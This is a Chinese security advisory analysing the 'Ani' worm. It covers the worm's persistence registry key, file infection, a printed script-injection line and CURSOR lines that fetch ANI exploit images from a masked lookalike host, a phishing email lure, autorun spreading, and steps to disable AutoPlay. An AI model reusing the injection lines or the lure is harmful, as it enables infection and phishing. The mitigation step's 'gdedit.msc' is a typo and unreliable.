国家计算机病毒应急处理中心通过对互联网的监测发现“艾妮”复合型病毒。该病毒通过微软Windows系统ANI(动态光标)文件处理的漏洞、感染正常的可执行文件和本地网页文件、发送电子邮件、和感染优盘及及移动存储介质等途径进行传播,病毒自我传播能力很强。并且感染该病毒后,会自动下载运行木马程序,造成较大危害。 该蠕虫先后出现很多变种,在出现后的短时期内迅速传播,遭受感染的用户难于彻底清除,给其工作带来诸多不便。 蠕虫情况分析如下: 病毒名称:Worm_MyInfect.af 中 文 名:“艾妮” 其他名称:I-Worm/AniLoad(江民) Worm.MyInfect (金山) Worm.DlOnlineGames (瑞星) 病毒类型:复合型 感染系统:Windows 9X/ Windows ME/ Windows NT/ Windows 2000/ Windows XP/ Windows 2003/ Windows Vista 病毒特性: 1、生成病毒文件 病毒运行后,复制自身到下面目录:%SysDir%\sysload3.exe 2、 修改注册表项 HKCU\Software\Microsoft\Windows\CurrentVersion\Run "System Boot Check"="%SysDir%\sysload3.exe"这样,病毒就可以 随Windows系统启动自动运行。 3、感染系统中文件 它能感染本地磁盘和网络共享目录中的可执行文件和脚本文件。 1) 感染可执行文件 将被感染文件和病毒融合成一个文件(被感染文件贴在病毒文件尾部)完成感 染。 2) 脚本类文件 在这些脚本文件尾加上如下注示 <script src=http:// ****.microfsot. com/Noindex.js></script> 下载该脚本文件,里面含有如下代码: <DIV style="CURSOR: url('http://****.microfsot.com/*.jpg')"> <DIV style="CURSOR: url('http://****.microfsot.com/*.jpg')"> 以上两个图片链接利用了ANI漏洞,图片文件中含有溢出攻击代码,因此打 开上面的Noindex.js网页时便会中毒。 4、下载指定网址文件 从指定网址下载木马程序和病毒升级程序。 5、通过电子邮件传播
病毒邮件特征如下:
发件人: i_love_cq@sohu.com
主题:你和谁视频的时候被拍下的?给你笑死了!
正文:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
http://****.microfsot.com/***/134952.htm
如果用户点击了以上带有病毒的网页,就会遭受感染。 6、其它
遍历a-z的所有驱动器,如果该驱动器为“可移动存储”就在该驱动器上创
建AUTORUN.INF,来达到传播自己的目的。检测软驱,若存在则复制病毒文
件到其中文件名为tool.exe,并生成autorun.inf文件,使病毒可以自动运
行,以传播自身。
修改hosts文件,屏蔽多个网址。这些网址大多是以前用来传播其他病毒的
站点。
6、用户应慎用操作系统默认提供的“自动播放”功能,防止在使用移动存
储介质过程中受到感染。用户可以在超级用户权限下按如下方法关闭该功能: Windows XP用户:
“开始”->“运行”->输入“gdedit.msc”确定后打开“组策略”;
依次打开:“计算机配置”->“管理模板”->单击“系统”项;
在右边设置中有一项“关闭自动播放”,双击打开其属性;
选择“己启用”在属性框中选中所有驱动器,点击“确定”;
同理再打开: “用户配制”->“管理模板”->单击“系统”项;
在右边设置中有一项“关闭自动播放”,双击打开属性;
选择“己启用”在属性框中选中所有驱动器,点击“确定”;
即可关闭自动播放。 注:Windows 2000用户打开“组策略”方法是,“开始”->“运行”->
输入“mmc”->单击确定,打开控制台,选择“控制台”菜单中“添加/删
除管理单元”,单击“添加”,选择“组策略”->添加;
| 
